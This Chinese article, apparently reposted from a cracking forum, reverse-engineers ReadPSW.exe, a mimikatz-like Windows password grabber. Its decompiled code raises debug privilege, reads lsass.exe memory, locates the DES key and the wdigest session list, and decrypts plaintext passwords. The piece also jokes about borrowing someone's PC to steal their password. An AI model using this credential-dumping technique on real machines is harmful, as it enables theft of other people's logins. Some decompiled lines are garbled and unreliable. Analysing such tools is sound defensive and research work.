对windows密码抓取神器mimikatz的逆向分析

安全 数据安全
mimikatz可谓获取windows明文密码神器,新版本更是加上了64位支持。用过一个小型获取明文密码程序,只有一个可执行文件ReadPSW.exe,通过逆向写出了源代码,稍微改改可能也可以支持64位。分享一下逆向过程和工作原理。

mimikatz可谓获取windows明文密码神器,新版本更是加上了64位支持。用过一个小型获取明文密码程序,只有一个可执行文件ReadPSW.exe,通过逆向写出了源代码,稍微改改可能也可以支持64位。分享一下逆向过程和工作原理。

了解mimikatz

只要借用一下电脑,便可轻松拿到密码……“女神,借用电脑一看可否?”

大神们都知道的东西吧,渗透测试常用工具。法国一个牛B的人写的轻量级调试器,可以帮助安全测试人员抓取Windows密码。

mimikatz 最近发布了它的2.0版本,抓密码命令更加简单了,估计作者也看到了对它这个神器最多的研究就是直接抓密码,为神马不发布一个直接一键版,哈哈哈哈哈。新功能还包括能够通过获取的kerberos登录凭据,绕过支持RestrictedAdmin模式的win8或win2012svr的远程终端(RDP) 的登陆认证。建议默认禁止RestrictedAdmin模式登录。更多内容点我

逆向过程

我喜欢先用IDA看大致流程,遇到难以静态看出来的函数再用OD或者windbg。IDA F5 main函数,一段一段的看。

  1. int __cdecl main_0()  
  2. {  
  3.   int hdll; // eax@15  
  4.   HMODULE ModuleSecur32; // eax@15  
  5.   int LsaEnumerateLogonSessions; // eax@15  
  6.   int LsaGetLogonSessionData; // eax@15  
  7.   int LsaFreeReturnBuffer; // eax@15  
  8.   int bcrypt; // eax@27  
  9.   int hbcrypt; // eax@27  
  10.   int bcryptprimitives; // eax@27  
  11.   int hbcryptprimitives; // eax@27  
  12.   int status7; // eax@27  
  13.   const void *Base; // [sp+7Ch] [bp-2E0h]@25  
  14.   SIZE_T nSize; // [sp+80h] [bp-2DCh]@25  
  15.   int pLsaFreeReturnBuffer; // [sp+88h] [bp-2D4h]@15  
  16.   int pLsaGetLogonSessionData; // [sp+8Ch] [bp-2D0h]@15  
  17.   int pLsaEnumerateLogonSessions; // [sp+90h] [bp-2CCh]@15  
  18.   HMODULE Secur32; // [sp+94h] [bp-2C8h]@15  
  19.   LPCVOID l_LogSessList; // [sp+98h] [bp-2C4h]@15  
  20.   int LsaUnprotectMemory; // [sp+9Ch] [bp-2C0h]@15  
  21.   struct _OSVERSIONINFOA VersionInformation; // [sp+A8h] [bp-2B4h]@5  
  22.   HANDLE Lsass; // [sp+13Ch] [bp-220h]@3  
  23.   LPCVOID List[128]; // [sp+140h] [bp-21Ch]@18  
  24.   LPCVOID *First; // [sp+340h] [bp-1Ch]@20  
  25.   int LogonSessionNow; // [sp+344h] [bp-18h]@18  
  26.   int ListEntry; // [sp+348h] [bp-14h]@15  
  27.   SIZE_T NumberOfBytesRead; // [sp+34Ch] [bp-10h]@18  
  28.   int hDllLsasrv; // [sp+358h] [bp-4h]@15  

变量名大多是修改过的,通过分析子函数的功能做相应的改变,看起来方便一些。

  1. memset(&tt, -858993460, 0x320u);  
  2.  if ( EnableDebugPrivilege() != 1 )  
  3.    printf("EnableDebugPrivilege fail !"); 

首先提权,比较简单:

  1. pToken = &TokenHandle;  
  2. dwAccess = TOKEN_ALL_ACCESS;  
  3. ProcessHandle = GetCurrentProcess();  
  4. retProcessHandle = _chkesp(&dwAccess == &dwAccess, ProcessHandle, &dwAccess);  
  5. status = OpenProcessToken(retProcessHandle, dwAccess, pToken);  
  6.     status1 = LookupPrivilegeValueA(0, "SeDebugPrivilege", &Luid);  
  7. NewState.PrivilegeCount = 1;  
  8. NewState.Privileges[0].Luid.LowPart = Luid.LowPart;  
  9. NewState.Privileges[0].Luid.HighPart = Luid.HighPart;  
  10. NewState.Privileges[0].Attributes = 2;  
  11. status2 = AdjustTokenPrivileges(TokenHandle, 0, &NewState, 0x10u, 0, 0);  

接着main函数流程:

  1. Lsass = GetProcessHandle("lsass.exe");  
  2.   if ( Lsass )  
  3.   {  
  4.     offset_one = 0;  
  5.     offset_two = -1;  
  6.     memset(&VersionInformation, 0, 0x94u);  
  7.     VersionInformation.dwOSVersionInfoSize = 148;  
  8.     status = GetVersionExA(&VersionInformation);  
  9.     _chkesp(&t == &t, status, &v48);  
  10.     if ( VersionInformation.dwMajorVersion == 5 )  
  11.     {  
  12.       if ( VersionInformation.dwMinorVersion == 1 )  
  13.       {  
  14.         offset_one = 36;  
  15.         offset_two = 2;  
  16.       }  
  17.       else  
  18.       {  
  19.         if ( VersionInformation.dwMinorVersion == 2 )  
  20.         {  
  21.           offset_one = 28;  
  22.           offset_two = 4;  
  23.         }  
  24.       }  
  25.     }  
  26.     else  
  27.     {  
  28.       if ( VersionInformation.dwMajorVersion == 6 )  
  29.       {  
  30.         offset_one = 32;  
  31.         offset_two = 1;  
  32.       }  
  33.     }  
  34.     if ( offset_two == -1 )  
  35.     {  
  36.       status12 = CloseHandle(Lsass);  
  37.       _chkesp(&t == &t, status12, &v48);  
  38.       returned = 0;  
  39.     } 

上面工作主要是:获取lsass.exe进程句柄、根据不同版本赋值两个偏移量。可以看出支持xp和2003,之后版本vista、win7等使用同一偏移量。

  1. else  
  2.   {  
  3.     hdll = LoadLibraryA("lsasrv.dll");  
  4.     hDllLsasrv = _chkesp(&t == &t, hdll, &v48);  
  5.     LsaUnprotectMemory = GetFunctionAddr(hDllLsasrv, 0x7FFFDDDDu, db_8b_ff, 14u); 

这个GetFunctionAddr是我重命名的,跟进去看一下实现就知道了:

  1. int __cdecl GetFunctionAddr(int Module, unsigned int Limit, int Symbol, unsigned int Length)  
  2. {  
  3.   return RealGetFunctionAddr(Module, Limit, Symbol, Length);  
  4. }  

是一个跳转,接着跟进:

  1. int __cdecl RealGetFunctionAddr(int Module, unsigned int Limit, int Symbol, unsigned int Length)  
  2. {  
  3.   while ( Length + Module <= Limit )  
  4.   {  
  5.     label = Symbol;  
  6.     for ( i = 0; i < Length && *Module == *label; ++i )  
  7.     {  
  8.       ++Module;  
  9.       ++label;  
  10.     }  
  11.     if ( i == Length )  
  12.       break;  
  13.     ModuleModule = Module - i + 1;  
  14.   }  
  15.   return result;  
  16. }  

是用特征码查找函数地址的,想知道是什么函数最好用windbg跟一下,发现找到了lsasrv.dll的LsaUnprotectMemory 函数,这里我也对变量名进行了重命名。该函数用于解密LsaProtectMemory加密内存,这两个函数在LSA中用得非常多。

  1. l_LogSessList = GetWdigestl_LogSessList();  
  2. DesKey(Lsass, hDllLsasrv, offset_two);  

这两个函数挺关键,需要结合OD动态调试,先看第一个,中间有个类似上面的跳转,直接看实现函数:

  1. unsigned int __cdecl RealGetFunction()  
  2. {  
  3.   HMODULE hModule; // eax@1  
  4.   unsigned int moduleBase; // [sp+4Ch] [bp-10h]@1  
  5.   unsigned int returned; // [sp+50h] [bp-Ch]@1  
  6.   int SpInstanceInit; // [sp+54h] [bp-8h]@1  
  7.   HMODULE hLibModule; // [sp+58h] [bp-4h]@1  
  8.    
  9.   memset(&v6, -858993460, 0x50u);  
  10.   t1 = LoadLibraryA("wdigest.dll");  
  11.   hModule = _chkesp(&v5 == &v5, t1, &v11);  
  12.   hLibModule = hModule;  
  13.   v2 = GetProcAddress(hModule, "SpInstanceInit");  
  14.   SpInstanceInit = _chkesp(&v5 == &v5, v2, &v11);  
  15.   moduleBase = hLibModule;  
  16.   returned = 0;  
  17.   while ( moduleBase < SpInstanceInit && moduleBase )  
  18.   {  
  19.     returned = moduleBase;  
  20.     moduleBase = GetFunctionAddr(moduleBase + 8, SpInstanceInit, db_8b_45, 8u);  
  21.   }  
  22.   returned = *(returned - 4);  
  23.   status = FreeLibrary(hLibModule);  
  24.   _chkesp(&v5 == &v5, status, &v11);  
  25.   return returned;  

首先加载wdigest.dll模块,这里有详细的介绍。然后获取SpInstanceInit的地址,接着是一个查找函数的循环,根据特征码在SpInstanceInit地址低位查找某个地址,使用windbg可以看到要找的东西:

0:000> ln eax

(742ec29c) +0xc29c

这并不是一个函数,具体的作用现在还不知道。后面会用到。

看下面的函数,这个函数实际上是用来产生DES的密钥:

  1. const void *__cdecl make_DESKey(HANDLE hProcessLsass, int hDllLsasrv, int offset)  
  2. {  
  3.   int status; // eax@1  
  4.   const void *dwResult; // eax@1  
  5.   int Key; // eax@4  
  6.   char buffer; // [sp+Ch] [bp-68h]@1  
  7.   int OSVersion; // [sp+4Ch] [bp-28h]@1  
  8.   unsigned int HeapReverse; // [sp+50h] [bp-24h]@1  
  9.   const void *Buffer; // [sp+54h] [bp-20h]@4  
  10.   LPCVOID g_pDESXKey; // [sp+58h] [bp-1Ch]@4  
  11.   LPCVOID lpBuffer; // [sp+5Ch] [bp-18h]@1  
  12.   SIZE_T NumberOfBytesRead; // [sp+60h] [bp-14h]@1  
  13.   SIZE_T nSize; // [sp+64h] [bp-10h]@1  
  14.   int pImageNtHeaders; // [sp+68h] [bp-Ch]@1  
  15.   int hTmpDllLsasrv; // [sp+6Ch] [bp-8h]@1  
  16.   int DataSECTION; // [sp+70h] [bp-4h]@1  
  17.   int v27; // [sp+74h] [bp+0h]@1  
  18.    
  19.   memset(&buffer, -858993460, 0x68u);  
  20.   hTmpDllLsasrv = hDllLsasrv;  
  21.   DataSECTION = *(hDllLsasrv + 60) + hDllLsasrv + 288;  
  22.   lpBuffer = (hDllLsasrv + *(DataSECTION + 12));  // 获取lsasrv.dll的数据区  
  23.   nSize = ((*(DataSECTION + 8) >> 12) + 1) << 12;   // 数据区大小  
  24.   status = ReadProcessMemory(hProcessLsass, lpBuffer, lpBuffer, nSize, &NumberOfBytesRead); //读取数据区内容  
  25.   _chkesp(&v15 == &v15, status, &v27);  
  26.   pImageNtHeaders = hDllLsasrv + *(hTmpDllLsasrv + 60);  
  27.   HeapReverse = hDllLsasrv + *(pImageNtHeaders + 80);  
  28.   dwResult = offset;  
  29.   OSVersion = offset;  
  30.   if ( offset == 1 )  
  31.   {  
  32.     v8 = LoadLibraryA("bcrypt.dll");  
  33.     _chkesp(&v15 == &v15, v8, &v27);  
  34.     v9 = LoadLibraryA("bcryptprimitives.dll");  
  35.     _chkesp(&v15 == &v15, v9, &v27);  
  36.     v10 = GetFunctionAddr(hDllLsasrv, HeapReverse, "3仪E鑌b", 0xCu);   //根据特征码查找存放DES_KEY的地址  
  37.     g_pDESXKey = v10;  
  38.     g_pDESXKey = *(v10 - 1);  
  39.     v11 = ReadProcessMemory(hProcessLsass, g_pDESXKey, &Buffer, 4u, &NumberOfBytesRead);  
  40.     _chkesp(&v15 == &v15, v11, &v27);  
  41.     v12 = ReadProcessMemory(hProcessLsass, Buffer, &t_Key, 0x200u, &NumberOfBytesRead);    // 通过两次内存查找找到KEY  
  42.     _chkesp(&v15 == &v15, v12, &v27);  
  43.     lpBuffer = g_pDESXKey;  
  44.     *g_pDESXKey = &t_Key;  
  45.     v13 = ReadProcessMemory(hProcessLsass, lpBaseAddress, &unk_42BFB8, 0x200u, &NumberOfBytesRead);  
  46.     _chkesp(&v15 == &v15, v13, &v27);  
  47.     lpBuffer = &lpBaseAddress;  
  48.     lpBaseAddress = &unk_42BFB8;  
  49.     v14 = ReadProcessMemory(hProcessLsass, dword_42AFC4, &unk_42ADB8, 0x200u, &NumberOfBytesRead);  
  50.     dwResult = _chkesp(&v15 == &v15, v14, &v27);  
  51.     dword_42AFC4 = &unk_42ADB8;  
  52.   }  
  53.   else  
  54.   {  
  55.     if ( OSVersion == 2 || OSVersion == 4 )  
  56.     {  
  57.       Key = GetFunctionAddr(hDllLsasrv, HeapReverse, Key_Symbol, 0xCu);  
  58.       g_pDESXKey = Key;  
  59.       g_pDESXKey = *(Key + 12);  
  60.       v6 = ReadProcessMemory(hProcessLsass, g_pDESXKey, &Buffer, 4u, &NumberOfBytesRead);  
  61.       _chkesp(&v15 == &v15, v6, &v27);  
  62.       v7 = ReadProcessMemory(hProcessLsass, Buffer, &t_Key, 0x200u, &NumberOfBytesRead);  
  63.       _chkesp(&v15 == &v15, v7, &v27);  
  64.       dwResult = g_pDESXKey;  
  65.       lpBuffer = g_pDESXKey;  
  66.       *g_pDESXKey = &t_Key;  
  67.     }  
  68.   }  
  69.   return dwResult;  
  70. }  

根据最初得到的偏移,读取进程地址空间,获取DES的密钥。了解了这两个函数内容接着回归main函数:

  1. status13 = LoadLibraryA("Secur32.dll");  
  2. ModuleSecur32 = _chkesp(&t == &t, status13, &v48);  
  3. Secur32 = ModuleSecur32;  
  4. LsaEnumerateLogonSessions = GetProcAddress(ModuleSecur32, "LsaEnumerateLogonSessions");  
  5. pLsaEnumerateLogonSessions = _chkesp(&t == &t, LsaEnumerateLogonSessions, &v48);  
  6. LsaGetLogonSessionData = GetProcAddress(Secur32, "LsaGetLogonSessionData");  
  7. pLsaGetLogonSessionData = _chkesp(&t == &t, LsaGetLogonSessionData, &v48);  
  8. LsaFreeReturnBuffer = GetProcAddress(Secur32, "LsaFreeReturnBuffer");  
  9. pLsaFreeReturnBuffer = _chkesp(&t == &t, LsaFreeReturnBuffer, &v48);  
  10. us1 = (pLsaEnumerateLogonSessions)(&count, &ListEntry);  

加载secur32.dll,然后获取几个函数的地址,枚举登陆会话和获取登陆会话数据。接着调用LsaEnumerateLogonSessions得到当前登录的会话个数以及所有会话组成的列表。MSDN上说明了这个函数,会返回会话的LUID。

  1.     _chkesp(&t == &t, status1, &v48);  
  2.       for ( i = 0; i < count; ++i )  
  3.       {  
  4.         LogonSessionNow = ListEntry + 8 * i;// 根据这里可以知道  
  5.         output_name_session(pLsaGetLogonSessionData, pLsaFreeReturnBuffer, ListEntry + 8 * i);  // 这里输出登陆用户名  
  6.    
  7. 进入output_name_session看看:  
  8. int __cdecl output_name_session_real(int (__stdcall *pLsaGetLogonSessionData)(_DWORD, _DWORD), int (__stdcall *pLsaFreeReturnBuffer)(_DWORD), int LogonSessionNow)  
  9. {  
  10.   int status; // eax@1  
  11.   int status1; // eax@1  
  12.   char v6; // [sp+0h] [bp-50h]@1  
  13.   char v7; // [sp+Ch] [bp-44h]@1  
  14.   int LogonSessionData; // [sp+4Ch] [bp-4h]@1  
  15.   int v9; // [sp+50h] [bp+0h]@1  
  16.    
  17.   memset(&v7, -858993460, 0x44u);  
  18.   status = pLsaGetLogonSessionData(LogonSessionNow, &LogonSessionData);  
  19.   _chkesp(&v6 == &v6, status, &v9);  
  20.   printf("UserName: %S\n", *(LogonSessionData + 16));  
  21.   printf("LogonDomain: %S\n", *(LogonSessionData + 24));  
  22.   status1 = pLsaFreeReturnBuffer(LogonSessionData);  
  23.   return _chkesp(&v6 == &v6, status1, &v9);  
  24. }  
  25. 这里用了之前查找的LsaGetLogonSessionData和LsaFreeReturnBuffer,输出登陆名和域名。  
  26.    
  27.         status3 = ReadProcessMemory(Lsass, l_LogSessList, List, 0x100u, &NumberOfBytesRead);   // 这里读取之前获取的那个不明地址内容到List  
  28.         _chkesp(&t == &t, status3, &v48);  
  29.         while ( List[0] != l_LogSessList )  
  30.         {  
  31.           status4 = ReadProcessMemory(Lsass, List[0], List, 0x100u, &NumberOfBytesRead);  
  32.           _chkesp(&t == &t, status4, &v48);  
  33.           First = &List[4];  
  34.           if ( List[4] == *LogonSessionNow )  
  35.           {  
  36.             if ( First[1] == *(LogonSessionNow + 4) )       //  这个First[1]看着太别扭了,实际上就是比较List[4]和枚举到的会话LUID值  
  37.               break;//  这里可以知道之前那个不明地址<Unloaded_wdigest.dll>+0xc29c是个列表  
  38.           }  
  39.         }  
  40.         if ( List[0] == l_LogSessList )  
  41.         {  
  42.           printf("Specific LUID NOT found\n");  
  43.         }  
  44.         else  
  45.         {  
  46.           nSize = 0;  
  47.           v28 = (offset_one + First);  
  48.           nSize = *(offset_one + First + 2);  
  49.           Base = *(offset_one + First + 4);                    //  还是使用了First,不要忘记First是从当时那个不明地址处读取的值  
  50.           memset(Buffer2, 0, 0x100u);  
  51.           status2 = ReadProcessMemory(Lsass, Base, Buffer2, nSize, &NumberOfBytesRead);  
  52.           _chkesp(&t == &t, status2, &v47);//  这里读到加密之后的密码。整个流程就清楚了,使用LsaEnumerateSessions获取LUIDs,与之前通过特征码找到的l_LogSessList结合找出密码。l_LogSessList保存了密码的长度和存放地址以及会话LUID,是个重要的未公开结构体。  
  53.           status5 = (LsaUnprotectMemory)(Buffer2, nSize);  
  54.           _chkesp(&t == &t, status5, &v47);  
  55.           printf("password: %S\n\n", Buffer2);  
  56.         } 

后面是一些释放dll和内存的工作,不再赘述。程序和IDA数据库右键图片可以得到。

责任编辑:蓝雨泪 来源: 吾爱破解论坛
相关推荐

2014-06-26 16:58:32

mimikatz2.0密码抓取

2016-06-27 09:37:35

2015-08-21 17:52:52

逆向分析BinNavi

2020-09-21 09:58:01

Frida

2018-08-20 13:46:59

Android逆向分析终端安全

2020-08-24 14:21:27

app爬虫Python

2018-08-22 09:15:31

2014-07-01 10:09:01

2022-10-20 10:37:44

2010-09-30 09:40:45

2016-10-24 14:53:30

Android app使用技巧

2012-12-26 13:39:47

2009-03-18 08:56:39

2012-05-18 09:54:05

2024-08-06 09:54:20

2010-03-03 15:39:50

Python抓取网页内

2023-09-11 08:40:34

AOTVMP代码

2017-12-13 15:10:40

Linux性能分析神器BPF

2009-06-18 14:51:12

Hibernate缓存Hibernate

2012-11-15 13:37:32

dedecms注入脚本攻防
点赞
收藏

51CTO技术栈公众号